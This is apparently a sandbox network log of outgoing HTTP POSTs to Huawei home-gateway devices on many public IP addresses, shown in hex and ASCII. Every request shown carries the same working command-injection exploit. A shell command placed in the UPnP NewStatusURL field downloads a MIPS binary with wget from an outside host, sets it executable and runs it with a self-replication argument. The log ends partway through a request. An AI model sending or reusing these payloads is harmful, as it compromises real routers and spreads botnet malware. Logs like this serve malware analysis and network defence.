                                                        May 28, 2024 08:59:11.547492027 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1726192.168.2.2351722197.166.220.22937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.547492027 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1727192.168.2.2342358157.139.22.7137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.547518015 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1728192.168.2.2341964197.151.179.20537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.547550917 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1729192.168.2.2349144128.12.232.25337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.547579050 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1730192.168.2.2340016197.36.171.8637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.547621965 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1731192.168.2.234463841.143.52.3437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.547627926 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1732192.168.2.233580441.201.135.8637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.547627926 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1733192.168.2.2356698157.138.6.13837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.547661066 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1734192.168.2.2348394157.64.133.2637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.547665119 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1735192.168.2.234554841.81.36.21137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.547665119 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
